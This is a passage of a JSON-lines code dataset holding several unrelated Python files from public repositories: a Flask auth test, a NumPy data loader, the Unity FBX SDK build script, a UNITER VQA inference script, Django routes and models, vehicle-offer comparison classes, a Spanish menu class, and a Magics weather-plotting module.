self.client.post(\n '/api/v1/users/logout', headers=headers)\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'success')\n self.assertTrue(data['message'] ==\n 'You have successfully logged out.')\n self.assertEqual(response.status_code, 200)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"dalaineme/m-tracker","sub_path":"api/tests/test_auth.py","file_name":"test_auth.py","file_ext":"py","file_size_in_byte":8214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"2544276661","text":"#!/usr/bin/python\n#-*-coding:utf-8-*-\nfrom numpy import zeros\n\n__author__ = 'robin'\n#返回的是数据集和标记空间,其中attrnum为属性的数目,标记空间即为文件的最后一列,整个文件有(attrnum+1)列\ndef file2matrix(filename,attrNum):\n fr = open(filename)\n numberOfLines = len(fr.readlines()) #get the number of lines in the file\n dataSet = zeros((numberOfLines,attrNum)) #prepare matrix to return\n labelSpace = [] #prepare labels return\n fr = open(filename)\n index = 0\n for line in fr.readlines():\n line = line.strip()\n listFromLine = line.split('\\t')\n dataSet[index,:] = listFromLine[0:attrNum]\n labelSpace.append(float(listFromLine[-1]))\n index += 1\n return dataSet,labelSpace","repo_name":"robin2017/MachineLearningInAction","sub_path":"robin/util/fileUitl.py","file_name":"fileUitl.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38559675081","text":"#!/usr/bin/python -B\nimport argparse\nimport shutil\nimport os\nimport subprocess\nimport sys\n\nparser = argparse.ArgumentParser(description='Parse the options')\nparser.add_argument('--swig', type=str, dest='swig_location', help='Root location of the swig executable')\nparser.add_argument('--fbxsdk', type=str, dest='fbxsdk_location', help='location of the FBX SDK')\nparser.add_argument('-s', '--stevedore', action='store_true', dest='use_stevedore', help='Use stevedore (used for internal builds)')\nparser.add_argument('-n', '--ninja', action='store_true', dest='use_ninja', help='Generate Ninja build files')\nparser.add_argument('-t', '--build_type', default='Release', dest='build_type', help='Build type to do (Release, Debug, ...)')\nparser.add_argument('-z', '--zap', '-c', '--clean', action='store_true', dest='clean_build', help='Removes the build directory')\nparser.add_argument('-v', '--verbose', action='store_true', dest='verbose_build', help='Make CMake verbose')\nparser.add_argument('--yamato', action='store_true', dest='yamato_build', help='Used internally for CI')\nargs = parser.parse_args()\n\ncurdir = os.path.dirname(os.path.abspath(__file__))\nbuilddir = os.path.join(curdir, 'build')\n\n# Clean the build?\nif args.clean_build and os.path.exists(builddir):\n print(\"Deleting build directory..\")\n shutil.rmtree(builddir)\n\nif not os.path.exists(builddir):\n os.mkdir(builddir)\n\n# Set the executable name\nif sys.platform.startswith('win'):\n shell = True\n cmake_exe = 'cmake.exe'\nelse:\n cmake_exe = 'cmake'\n shell = False\n\n# Minimal configuration\nconfig_args = [\n cmake_exe,\n '..', # because the working directory is the \"build\" directory, go back\n '-DCMAKE_SOURCE_DIR={}'.format(curdir),\n '-DCMAKE_BUILD_TYPE={}'.format(args.build_type), \n '-DCMAKE_INSTALL_PREFIX={}'.format(os.path.join(builddir, 'install')),\n '-DCMAKE_OSX_ARCHITECTURES=arm64',\n ]\n\n# Where to find swig if not standard install\nif args.swig_location is not None:\n config_args.append('-DSWIG_EXECUTABLE={}'.format(args.swig_location))\n # config_args.append(args.swig_location)\nif args.fbxsdk_location is not None:\n config_args.append('-DFBXSDK_ROOT_PATH={}'.format(args.fbxsdk_location))\n\n# Use Stevedore?\nconfig_args.append('-DUSE_STEVEDORE' + ('=ON' if args.use_stevedore else '=OFF'))\n\n# Is a CI build?\nconfig_args.append('-DYAMATO' + ('=ON' if args.yamato_build else '=OFF'))\n\n# Generator selection\nconfig_args.append('-G')\nif args.use_ninja:\n config_args.append('Ninja')\nelse:\n if sys.platform.startswith('win'):\n config_args.append('Visual Studio 16 2019')\n config_args.append('-Ax64')\n else:\n config_args.append('Unix Makefiles')\n\n# Remove this if you're a build system dev\nconfig_args.append('-Wno-dev')\n\n# Do the config\nprint(' '.join(config_args))\nretcode = subprocess.check_call(config_args, stderr=subprocess.STDOUT, shell=shell, cwd=builddir)\n\nif retcode != 0:\n sys.exit(retcode)\n\n# And do the build\nbuild_args= [\n cmake_exe,\n '--build',\n '.',\n '--target',\n 'install',\n '--config',\n args.build_type\n]\n\nif args.verbose_build and (args.use_ninja or sys.platform.startswith('win')):\n build_args.append('--verbose')\n\nenv = None\n# Mac and Linux SWIG were compiled and have hard coded paths to swig.swg.\n# Set the correct location in the environment for the build, since the\n# configure is able to set it for itself.\nif args.use_stevedore and not sys.platform.startswith('win'):\n\n env = os.environ\n def find(name, path):\n '''\n https://stackoverflow.com/a/1724723\n '''\n for root, dirs, files in os.walk(path):\n if name in files:\n # we need only the directory\n return root\n env[\"SWIG_LIB\"] = find('swig.swg', builddir)\n\n\nprint(build_args)\nretcode = subprocess.check_call(build_args, stderr=subprocess.STDOUT, shell=shell, cwd=builddir, env=env)\n\nif retcode != 0:\n sys.exit(retcode)\n\nif sys.platform.startswith('darwin'):\n # On Mac build two binaries (one that works on arm and one x86_64 that works on 10.13+).\n # The arm binary is already built, here we build the second one and combine the two with lipo\n \n # use a different build directory\n builddir_legacy = os.path.join(curdir, 'build_legacy_mac')\n \n if args.clean_build and os.path.exists(builddir_legacy):\n shutil.rmtree(builddir_legacy)\n\n if not os.path.exists(builddir_legacy):\n os.mkdir(builddir_legacy)\n \n install_prefix = '-DCMAKE_INSTALL_PREFIX={}'.format(os.path.join(builddir_legacy, 'install'))\n \n # use all the same config args except the install prefix\n config_args = [a for a in config_args if not (a.startswith(\"-DCMAKE_INSTALL_PREFIX\") or a.startswith(\"-DCMAKE_OSX_ARCHITECTURES\"))] \n config_args.append(install_prefix)\n config_args.append('-DCMAKE_OSX_ARCHITECTURES=x86_64')\n retcode = subprocess.check_call(config_args, stderr=subprocess.STDOUT, shell=shell, cwd=builddir_legacy)\n\n if retcode != 0:\n sys.exit(retcode)\n\n retcode = subprocess.check_call(build_args, stderr=subprocess.STDOUT, shell=shell, cwd=builddir_legacy, env=env)\n if retcode != 0:\n sys.exit(retcode)\n\n # combine the arm build and the legacy build with lipo\n bundle_path = \"install/com.autodesk.fbx/Editor/Plugins/UnityFbxSdkNative.bundle/Contents/MacOS/UnityFbxSdkNative\"\n bundle_name = \"UnityFbxSdkNative\"\n arm_bundle = os.path.join(builddir, bundle_path)\n legacy_bundle = os.path.join(builddir_legacy, bundle_path)\n lipo_call = [\"lipo\", \"-create\", \"-output\", bundle_name, arm_bundle, legacy_bundle]\n retcode = subprocess.check_call(lipo_call, stderr=subprocess.STDOUT, shell=shell, cwd=curdir, env=env)\n if retcode != 0:\n sys.exit(retcode)\n \n # replace the arm bundle with the universal binary\n src = os.path.join(curdir, bundle_name)\n dst = arm_bundle\n shutil.copyfile(src, dst)\n\nsys.exit(retcode)","repo_name":"Unity-Technologies/com.autodesk.fbx","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":5940,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"76"} +{"seq_id":"69824376246","text":"import argparse\nimport json\nimport os\nfrom os.path import exists\nfrom time import time\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom apex import amp\nfrom horovod import torch as hvd\nimport numpy as np\nfrom cytoolz import concat\n\nfrom data import (TokenBucketSampler, PrefetchLoader,\n DetectFeatLmdb, TxtTokLmdb, VqaEvalDataset, vqa_eval_collate)\nfrom model.vqa import UniterForVisualQuestionAnswering\n\nfrom utils.logger import LOGGER\nfrom utils.distributed import all_gather_list\nfrom utils.misc import Struct\nfrom utils.const import BUCKET_SIZE, IMG_DIM\n\n\ndef main(opts):\n hvd.init()\n n_gpu = hvd.size()\n device = torch.device(\"cuda\", hvd.local_rank())\n torch.cuda.set_device(hvd.local_rank())\n rank = hvd.rank()\n LOGGER.info(\"device: {} n_gpu: {}, rank: {}, \"\n \"16-bits training: {}\".format(\n device, n_gpu, hvd.rank(), opts.fp16))\n\n hps_file = f'{opts.output_dir}/log/hps.json'\n model_opts = Struct(json.load(open(hps_file)))\n\n # train_examples = None\n ans2label_file = f'{opts.output_dir}/ckpt/ans2label.json'\n ans2label = json.load(open(ans2label_file))\n label2ans = {label: ans for ans, label in ans2label.items()}\n\n # load DBs and image dirs\n eval_img_db = DetectFeatLmdb(opts.img_db,\n model_opts.conf_th, model_opts.max_bb,\n model_opts.min_bb, model_opts.num_bb,\n opts.compressed_db)\n eval_txt_db = TxtTokLmdb(opts.txt_db, -1)\n eval_dataset = VqaEvalDataset(len(ans2label), eval_txt_db, eval_img_db)\n\n # Prepare model\n if exists(opts.checkpoint):\n ckpt_file = opts.checkpoint\n else:\n ckpt_file = f'{opts.output_dir}/ckpt/model_step_{opts.checkpoint}.pt'\n checkpoint = torch.load(ckpt_file)\n model = UniterForVisualQuestionAnswering.from_pretrained(\n f'{opts.output_dir}/log/model.json', checkpoint,\n img_dim=IMG_DIM, num_answer=len(ans2label))\n model.to(device)\n if opts.fp16:\n model = amp.initialize(model, enabled=True, opt_level='O2')\n\n sampler = TokenBucketSampler(eval_dataset.lens, bucket_size=BUCKET_SIZE,\n batch_size=opts.batch_size, droplast=False)\n eval_dataloader = DataLoader(eval_dataset,\n batch_sampler=sampler,\n num_workers=opts.n_workers,\n pin_memory=opts.pin_mem,\n collate_fn=vqa_eval_collate)\n eval_dataloader = PrefetchLoader(eval_dataloader)\n\n val_log, results, logits = evaluate(model, eval_dataloader, label2ans,\n opts.save_logits)\n result_dir = f'{opts.output_dir}/results_test'\n if not exists(result_dir) and rank == 0:\n os.makedirs(result_dir)\n\n all_results = list(concat(all_gather_list(results)))\n if opts.save_logits:\n all_logits = {}\n for id2logit in all_gather_list(logits):\n all_logits.update(id2logit)\n if hvd.rank() == 0:\n with open(f'{result_dir}/'\n f'results_{opts.checkpoint}_all.json', 'w') as f:\n json.dump(all_results, f)\n if opts.save_logits:\n np.savez(f'{result_dir}/logits_{opts.checkpoint}_all.npz',\n **all_logits)\n\n\n@torch.no_grad()\ndef evaluate(model, eval_loader, label2ans, save_logits=False):\n LOGGER.info(\"start running evaluation...\")\n model.eval()\n n_ex = 0\n st = time()\n results = []\n logits = {}\n for i, batch in enumerate(eval_loader):\n qids = batch['qids']\n scores = model(batch, compute_loss=False)\n answers = [label2ans[i]\n for i in scores.max(dim=-1, keepdim=False\n )[1].cpu().tolist()]\n for qid, answer in zip(qids, answers):\n results.append({'answer': answer, 'question_id': int(qid)})\n if save_logits:\n scores = scores.cpu()\n for i, qid in enumerate(qids):\n logits[qid] = scores[i].half().numpy()\n if i % 100 == 0 and hvd.rank() == 0:\n n_results = len(results)\n n_results *= hvd.size() # an approximation to avoid hangs\n LOGGER.info(f'{n_results}/{len(eval_loader.dataset)} '\n 'answers predicted')\n n_ex += len(qids)\n n_ex = sum(all_gather_list(n_ex))\n tot_time = time()-st\n val_log = {'valid/ex_per_s': n_ex/tot_time}\n model.train()\n LOGGER.info(f\"evaluation finished in {int(tot_time)} seconds \"\n f\"at {int(n_ex/tot_time)} examples per second\")\n return val_log, results, logits\n\n\ndef compute_score_with_logits(logits, labels):\n logits = torch.max(logits, 1)[1] # argmax\n one_hots = torch.zeros(*labels.size(), device=labels.device)\n one_hots.scatter_(1, logits.view(-1, 1), 1)\n scores = (one_hots * labels)\n return scores\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n # Required parameters\n parser.add_argument(\"--txt_db\",\n default=None, type=str,\n help=\"The input train corpus. (LMDB)\")\n parser.add_argument(\"--img_db\",\n default=None, type=str,\n help=\"The input train images.\")\n parser.add_argument('--compressed_db', action='store_true',\n help='use compressed LMDB')\n parser.add_argument(\"--checkpoint\",\n default=None, type=str,\n help=\"can be the path to binary or int number (step)\")\n parser.add_argument(\"--batch_size\",\n default=8192, type=int,\n help=\"number of tokens in a batch\")\n\n parser.add_argument(\"--output_dir\", default=None, type=str,\n help=\"The output directory of the training command\")\n\n parser.add_argument(\"--save_logits\", action='store_true',\n help=\"Whether to save logits (for making ensemble)\")\n\n # Prepro parameters\n\n # device parameters\n parser.add_argument('--fp16',\n action='store_true',\n help=\"Whether to use 16-bit float precision instead \"\n \"of 32-bit\")\n parser.add_argument('--n_workers', type=int, default=4,\n help=\"number of data workers\")\n parser.add_argument('--pin_mem', action='store_true',\n help=\"pin memory\")\n\n args = parser.parse_args()\n\n main(args)\n","repo_name":"ChenRocks/UNITER","sub_path":"inf_vqa.py","file_name":"inf_vqa.py","file_ext":"py","file_size_in_byte":6578,"program_lang":"python","lang":"en","doc_type":"code","stars":752,"dataset":"github-code","pt":"76"} +{"seq_id":"23215401364","text":"from django.urls import path\nfrom portfolio_app.api.views import PortfolioListCreateView,PortfolioRetriveUpdateDestroyView,HoldingListCreateView,HolidingRetriveUpdateDestroyView\n\nurlpatterns = [\n path('portfolio/',PortfolioListCreateView.as_view(),name ='portfolio-list'),\n path('portfolio//', PortfolioRetriveUpdateDestroyView.as_view(),name = 'portfolio-detail'),\n path('portfolio//holdings/',HoldingListCreateView.as_view(),name = 'holdings'),\n path('portfolio//holdings//', HolidingRetriveUpdateDestroyView.as_view(),name = 'holding-details')\n \n]\n","repo_name":"kashyap21/stock_project","sub_path":"portfolio_app/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30093344066","text":"from django.core.validators import MaxValueValidator, MinValueValidator\nfrom django.db import models\nfrom django.utils.translation import gettext as _\n\nfrom apps.ideas import fields as custom_fields\n\nTOTAL_BUDGET_HELP = _('Please indicate your overall budget. '\n 'The total budget may (but does not '\n 'have to) include the applicant’s own '\n 'contribution and/or external sources '\n 'of funding. Please only enter whole '\n 'numbers, no decimal signs like points, '\n 'commas or spaces. This section will be '\n 'published in the idea space.')\n\nBUDGET_REQUESTED_HELP = _('Funding requested from Civic Europe '\n 'can range from 1 to 35000 EUR. Depending '\n 'on your planning, the amount entered here '\n 'can be the same as the “total budget” '\n 'figure entered above. This section will be '\n 'published in the idea space.')\n\nMAJOR_EXPENSES_HELP = _('What are the major expenses you foresee for the '\n 'implementation of your idea? Please share a rough '\n 'estimate by cost category (e.g. office expenses '\n '1000 EUR, travel and accommodation costs 3000 EUR, '\n 'public relations 2000 EUR, personnel costs etc.) '\n 'This section will be published in the idea space.')\n\nDURATION_HELP = _('How many months will it take to implement your idea?')\n\n\nclass FinancesSection(models.Model):\n total_budget = custom_fields.CustomIntegerField(\n verbose_name=_('Total budget'),\n help_text=TOTAL_BUDGET_HELP,\n validators=[\n MinValueValidator(0)\n ]\n )\n budget_requested = custom_fields.CustomIntegerField(\n verbose_name=_('Funding requested from Civic Europe'),\n help_text=BUDGET_REQUESTED_HELP,\n validators=[\n MaxValueValidator(35000),\n MinValueValidator(0)\n ]\n )\n major_expenses = models.TextField(\n max_length=500,\n verbose_name=_('Major expenses'),\n help_text=MAJOR_EXPENSES_HELP\n )\n duration = custom_fields.CustomIntegerField(\n verbose_name=_('Duration of idea (number of months)'),\n help_text=DURATION_HELP\n )\n\n class Meta:\n abstract = True\n","repo_name":"liqd/a4-civic-europe","sub_path":"apps/ideas/models/sections/finances_section.py","file_name":"finances_section.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"1853140273","text":"\n\n\nclass ComparisonClients():\n def __init__(self,Group1 ,Group2):\n self.ClientID = [Group1.ClientID, Group2.ClientID]\n self.Name = [Group1.Name, Group2.Name]\n self.Location = [Group1.Location, Group2.Location]\n self.Phone = [Group1.Phone, Group2.Phone]\n self.Website = [Group1.Website, Group2.Website]\n self.IsActive = [Group1.IsActive, Group2.IsActive]\n\n self.Vehicles = []\n self.Batches = []\n\nclass ComparisonBatches():\n def __init__(self,Group1 ,Group2):\n self.ClientID = [Group1.ClientID, Group2.ClientID]\n self.MaxBatchID = [Group1.MaxBatchID, Group2.MaxBatchID]\n self.ExportJobEndDT = [Group1.ExportJobEndDT, Group2.ExportJobEndDT]\n self.JobYear = [Group1.JobYear, Group2.JobYear]\n self.JobMonth = [Group1.JobMonth, Group2.JobMonth]\n self.JobDay = [Group1.JobDay, Group2.JobDay]\n self.JobHour = [Group1.JobHour, Group2.JobHour]\n self.LocalTime = [Group1.LocalTime, Group2.LocalTime]\n self.CurrentYear = [Group1.CurrentYear, Group2.CurrentYear]\n self.CurrentMonth = [Group1.CurrentMonth, Group2.CurrentMonth]\n self.CurrentDay = [Group1.CurrentDay, Group2.CurrentDay]\n self.CurrentHour = [Group1.CurrentHour, Group2.CurrentHour]\n\n\nclass ComparisonVehiclesOffers():\n def __init__(self,**kwargs):\n self.ClientID = kwargs['ClientID']\n self.DealerID = kwargs['DealerID']\n self.VehicleID = kwargs['VehicleID']\n self.BatchID = kwargs['BatchID']\n self.StockNumber = kwargs['StockNumber']\n self.VIN = kwargs['VIN']\n self.DealerCode = kwargs['DealerCode']\n self.State = kwargs['State']\n self.County = kwargs['County']\n self.ZipCode = kwargs['ZipCode']\n\n self.MakeName = kwargs['BrandName']\n self.ModelName = kwargs['Model']\n self.ModelNumber = kwargs['ModelNumber']\n self.Trim = kwargs['Trim']\n self.Year = kwargs['Year']\n self.Invoice = kwargs['Invoice']\n self.SellingPrice = kwargs['SellingPrice']\n self.MSRP = kwargs['MSRP']\n self.DealerPrice = kwargs['DealerPrice']\n self.PriceOption = kwargs['PriceOption']\n\n self.StockType = kwargs['StockType']\n self.Payment = kwargs['Payment']\n self.BasePayment = kwargs['BasePayment']\n self.PaymentNoTax = kwargs['PaymentNoTax']\n self.Lender = kwargs['Lender']\n self.Mileage = kwargs['Mileage']\n self.Term = kwargs['Term']\n self.DownPayment = kwargs['Downpayment']\n self.DueAtSigning = kwargs['DueAtSigning']\n self.TotalRebate = kwargs['TotalRebate']\n self.OfferTypeID = kwargs['OfferTypeID']\n self.OfferType = kwargs['OfferType']\n self.Disclaimer = kwargs['Disclaimer']\n self.APR = kwargs['APR']\n self.OfferRank = kwargs['OfferRank']\n self.ModelRank = kwargs['ModelRank']\n self.ModelNoRank = kwargs['ModelNoRank']\n self.ClientName = kwargs['ClientName']\n self.RegistrationFee = kwargs['RegistrationFee']\n self.AcquisitionFee = kwargs['AquisitionFee']\n self.InceptionFees = kwargs['InceptionFees']\n self.OtherFees = kwargs['OtherFees']\n self.TotalRebate = kwargs['TotalRebate']\n self.MarkupRate = kwargs['MarkupRate']\n self.BuyRate = kwargs['BuyRate']\n self.SellRate = kwargs['SellRate']\n self.PaidReserve = kwargs['PaidReserve']\n self.AmountFinanced = kwargs['AmountFinanced']\n self.ResidualPercent = kwargs['ResidualPercent']\n self.ResidualDollar = kwargs['ResidualDollar']\n self.MaxAdvance = kwargs['MaxAdvance']\n self.SalesTax = kwargs['SalesTax']\n self.ProgramCode = kwargs['ProgramCode']\n self.HasOEMException = kwargs['HasOEMException']\n self.PriceChange = kwargs['PriceChange']\n self.IsCaptive = kwargs['IsCaptive']\n self.IsSpecial = kwargs['IsSpecial']\n self.IsVisible = kwargs['IsVisible']\n self.VINOffer = f'{self.VIN}{self.OfferTypeID}'\n\n\n\n def __repr__(self):\n return f\"{self.ClientID} {self.DealerID} {self.VIN} {self.OfferTypeID}\"\n\n\n\n\n\n\n","repo_name":"MorriesMarketing/OldPython","sub_path":"QualityAssuranceBot/ComparisonObject.py","file_name":"ComparisonObject.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5436830906","text":"\r\nfrom Manejador import Manejador\r\nfrom ClaseLavarropa import Lavaropa\r\nfrom ClaseObj import Object\r\nclass Menu:\r\n opcion=None\r\n \r\n def __init__(self):\r\n self.__opcion=0\r\n def mostrarmenu(self):\r\n jsonF = Object()\r\n Aparatos = Manejador()\r\n diccionario = jsonF.leerJSONArchivo('aparatoselectronicos.json')\r\n Aparatos = jsonF.decodificarDiccionario(diccionario)\r\n\r\n while self.__opcion!=-1:\r\n print('[1] Inssertar aparato en posicion especifica')\r\n print('[2] Agrega a coleccion')\r\n print('[3] Motrar')\r\n print('[4] Mostar ')\r\n print('[5] Mostrar')\r\n print('[6] Mostrar')\r\n print('[7] Almacenar')\r\n self.__opcion=input('\\nIngrese numero: ')\r\n if self.__opcion=='1':\r\n pos = int(input('Ingresar posicion donde insertara el elemento '))\r\n aparato = Aparatos.crearaparato()\r\n Aparatos.insertarElemento(aparato,pos)\r\n elif self.__opcion=='2':\r\n aparato = Aparatos.crearaparato()\r\n Aparatos.agregarElemento(aparato)\r\n elif self.__opcion=='3':\r\n posicion = int(input('Ingresar posicion '))\r\n Aparatos.mostrarElemento(posicion)\r\n elif self.__opcion=='4':\r\n Aparatos.Aparatosphillips()\r\n elif self.__opcion=='5':\r\n Aparatos.marcalavaropas()\r\n elif self.__opcion=='6':\r\n Aparatos.mostrarDatos()\r\n elif self.__opcion=='7':\r\n listaJSON = Aparatos.guardarJSON()\r\n jsonF.guardarJSONArchivo(listaJSON, 'Aparato.json')\r\n print('Archivo guardado')\r\n ","repo_name":"MoraJuan/Eje6U3","sub_path":"Menu.py","file_name":"Menu.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37437859002","text":"import tempfile\nimport os\nimport json\nimport numpy as np\nimport threading\nimport sys\nimport hashlib\nimport xarray as xr\nfrom contextlib import closing\n\nfor n in ('LD_LIBRARY_PATH', 'DYLD_LIBRARY_PATH'):\n os.environ[n] = '/opt/ecmwf/magics/lib:/Users/baudouin/build/magics/lib'\n\n\n# os.environ['MAGPLUS_HOME'] = '/Users/baudouin/build/magics'\n\nsys.path.append('/opt/ecmwf/magics/lib/python2.7/site-packages')\n\nfrom Magics import macro\n\n\nLOCK = threading.Lock()\n\nPROJECTIONS = {\n \"global\": macro.mmap(subpage_upper_right_longitude=180.00,\n subpage_upper_right_latitude=90.00,\n subpage_lower_left_latitude=-90.00,\n subpage_lower_left_longitude=-180.0,\n subpage_map_projection='cylindrical'),\n \"uk\": macro.mmap(subpage_upper_right_longitude=1.5,\n subpage_upper_right_latitude=60.00,\n subpage_lower_left_latitude=44.5,\n subpage_lower_left_longitude=-14.0,\n subpage_map_projection='cylindrical'),\n \"france\": macro.mmap(subpage_upper_right_longitude=10.5,\n subpage_upper_right_latitude=52.5,\n subpage_lower_left_latitude=37.0,\n subpage_lower_left_longitude=-5.0,\n subpage_map_projection='cylindrical'),\n}\n\n\nONOFF = {False: 'off',\n True: 'on'}\n\n\ndef identity(x):\n return x\n\n\ndef as_plottable(field, position=0, metadata=None, preproc=None):\n\n # print('as_plottable', preproc)\n\n if isinstance(field, str):\n grib = macro.mgrib(grib_input_file_name=field,\n grib_file_address_mode='byte_offset',\n grib_field_position=position)\n return grib, None, metadata, 'path'\n\n if hasattr(field, 'path') and hasattr(field, 'offset') and hasattr(field, 'area'):\n grib = macro.mgrib(grib_input_file_name=field.path,\n grib_file_address_mode='byte_offset',\n grib_field_position=int(field.offset))\n return grib, field.area, metadata, 'gridfield'\n\n if isinstance(field, xr.DataArray):\n if metadata is None:\n metadata = {}\n grib = {}\n for k, v in field.attrs.items():\n if k.startswith('GRIB_'):\n grib[k[5:]] = str(v)\n else:\n metadata[k] = str(v)\n\n # Only key GRIB\n if grib:\n metadata = grib\n\n n, w, s, e = float(field.latitude[0]), float(field.longitude[0]), float(field.latitude[-1]), float(field.longitude[-1])\n ns = float(field.latitude[1]) - float(field.latitude[0])\n ew = float(field.longitude[1]) - float(field.longitude[0])\n\n grib = macro.minput(input_field=field.values,\n input_field_initial_latitude=n,\n input_field_latitude_step=ns,\n input_field_initial_longitude=w,\n input_field_longitude_step=ew,\n input_metadata=metadata,)\n return grib, (n, w, s, e), metadata, 'xarray'\n\n if hasattr(field, 'array'):\n ew, ns = field.grid\n n, w, s, e = field.area\n if metadata is None:\n metadata = field.metadata\n\n if preproc:\n f = preproc\n else:\n f = identity\n\n grib = macro.minput(input_field=f(field.array),\n input_field_initial_latitude=float(n),\n input_field_latitude_step=-float(ns),\n input_field_initial_longitude=float(w),\n input_field_longitude_step=float(ew),\n input_metadata=metadata,)\n return grib, (n, w, s, e), metadata, 'bespoke'\n\n if isinstance(field, np.ndarray):\n class F:\n def __init__(self, f):\n self.array = f\n self.grid = metadata['grid']\n self.area = metadata['area']\n\n return as_plottable(F(field), metadata=metadata, preproc=preproc)\n\n if isinstance(field, list):\n if isinstance(position, list):\n return [as_plottable(f, p, metadata) for (f, p) in zip(field, position)]\n else:\n return [as_plottable(f, 0, metadata) for f in field]\n\n raise ValueError(\"Cannot plot %s\" % (type(field), ))\n\n\ndef make_contour(contour, legend):\n\n if isinstance(contour, list):\n return [make_contour(c, legend) for c in contour]\n\n if contour is not None:\n if isinstance(contour, str):\n return macro.mcont(contour_automatic_setting='ecmwf',\n legend=legend,\n contour_style_name=contour,)\n else:\n d = dict(**contour)\n d['legend'] = legend\n return macro.mcont(**d)\n else:\n return macro.mcont(contour_automatic_setting='ecmwf', legend=legend,)\n\n\ndef plot_to_file(field,\n file,\n size=10.,\n projection=None,\n contour=None,\n grid=True,\n title=True,\n title_text='Title',\n width=400,\n ratio=1.0,\n area=None,\n metadata=None,\n text_format='(automatic)',\n position=0,\n format=None,\n preproc=None,\n legend=False,\n boxes=[]):\n\n plottable = as_plottable(field, position, metadata, preproc)\n if isinstance(plottable, list):\n _, in_file_area, metadata, what = plottable[0]\n grib = [g[0] for g in plottable]\n else:\n grib, in_file_area, metadata, what = plottable\n\n # print(\"XXXX PLOT\", what, \"metadata =>\", metadata,\n # \"contour => \", contour,\n # \"area =>\", area)\n\n if projection is None:\n if area is None:\n area = in_file_area\n\n if area:\n n, w, s, e = area\n projection = macro.mmap(subpage_upper_right_longitude=float(e),\n subpage_upper_right_latitude=float(n),\n subpage_lower_left_latitude=float(s),\n subpage_lower_left_longitude=float(w),\n subpage_map_projection='cylindrical')\n else:\n projection = macro.mmap(subpage_map_projection='cylindrical')\n\n if isinstance(projection, str):\n projection = PROJECTIONS[projection]\n\n contour = make_contour(contour, legend)\n\n if isinstance(grib, list) and not isinstance(contour, list):\n contour = [contour] * len(grib)\n\n base, ext = os.path.splitext(file)\n if format is None:\n format = ext[1:]\n output = macro.output(output_formats=[format],\n output_name_first_page_number='off',\n page_x_length=float(size),\n page_y_length=float(size) * ratio,\n super_page_x_length=float(size),\n super_page_y_length=float(size) * ratio,\n subpage_x_length=float(size),\n subpage_y_length=float(size) * ratio,\n subpage_x_position=0.,\n subpage_y_position=0.,\n output_width=width,\n page_frame='on',\n page_id_line='off',\n output_name=base)\n\n foreground = macro.mcoast(map_grid=ONOFF[grid],\n map_label='off')\n\n background = macro.mcoast(map_grid=ONOFF[grid],\n map_grid_colour='tan',\n map_label='off',\n map_coastline_land_shade='on',\n map_coastline_land_shade_colour='cream',\n map_coastline_colour='tan')\n data = []\n data.append(background)\n\n if isinstance(grib, list):\n for g, c in zip(grib, contour):\n data.append(g)\n data.append(c)\n else:\n data.append(grib)\n data.append(contour)\n\n data.append(foreground)\n\n bb = float(len(boxes) + 1)\n for i, b in enumerate(boxes):\n inc = 0.1\n n, w, s, e = b\n a = np.ones(((e - w + inc) / inc - 2, ((n - s + inc) / inc) - 2))\n a = np.pad(a, 1, 'constant', constant_values=0)\n\n b = macro.minput(input_field=a,\n input_field_initial_latitude=float(n),\n input_field_latitude_step=-float(inc),\n input_field_initial_longitude=float(w),\n input_field_longitude_step=float(inc),\n input_metadata={})\n data.append(b)\n # print a.shape\n\n d = \"rgba(1,0,0,%g)\" % (i / bb)\n\n c = macro.mcont(contour=\"off\",\n contour_shade=\"on\",\n contour_shade_method=\"area_fill\",\n contour_shade_max_level_colour=d,\n contour_shade_min_level_colour=d,)\n\n data.append(c)\n\n if title:\n data.append(macro.mtext())\n\n if legend:\n width = 1000\n height = 200\n width_cm = float(width) / 40.\n height_cm = float(height) / 40.\n output = macro.output(output_formats=[format],\n output_name_first_page_number='off',\n # output_cairo_transparent_background='on',\n output_width=width,\n super_page_x_length=width_cm,\n super_page_y_length=height_cm,\n output_name=base,\n subpage_frame=False,\n page_frame=False,\n page_id_line=False)\n\n leg = macro.mlegend(\n legend_title=\"on\",\n legend_title_font_size=1.1,\n legend_display_type=\"continuous\",\n legend_title_text=title_text,\n legend_text_colour=\"charcoal\",\n legend_box_mode=\"positional\",\n legend_text_format=text_format,\n legend_box_x_position=0.00,\n legend_box_y_position=0.00,\n legend_box_x_length=width_cm,\n legend_box_y_length=height_cm,\n legend_box_blanking=\"on\",\n legend_text_font_size=\"15%\",\n legend_border=False,\n legend_border_colour=\"rgb(0.18,0.18,0.62)\"\n )\n\n with LOCK:\n # print(output, data[1], data[2], leg)\n macro.plot(output, data[1], data[2], leg)\n return\n\n data.append(macro.page())\n\n # print(output, projection, data)\n\n with LOCK:\n macro.plot(output, projection, data)\n\n\ndef cached_plot(field, cache, format='png', key=None, **kwargs):\n\n if key is None:\n key = dict(field=field, kwargs=kwargs)\n key = json.dumps(key, sort_keys=True)\n key = hashlib.md5(key.encode('utf-8')).hexdigest()\n\n result = os.path.join(cache, key + '.' + format)\n if not os.path.exists(result):\n\n if format == 'grib':\n from grib import GribFile\n offset = kwargs['position']\n length = GribFile(field).at_offset(offset).totalLength\n with open(field, 'rb') as f:\n f.seek(offset)\n try:\n with open(result, 'wb') as g:\n g.write(f.read(length))\n except Exception:\n if os.path.exists(result):\n os.path.unlink(result)\n raise\n\n else:\n plot_to_file(field, result, 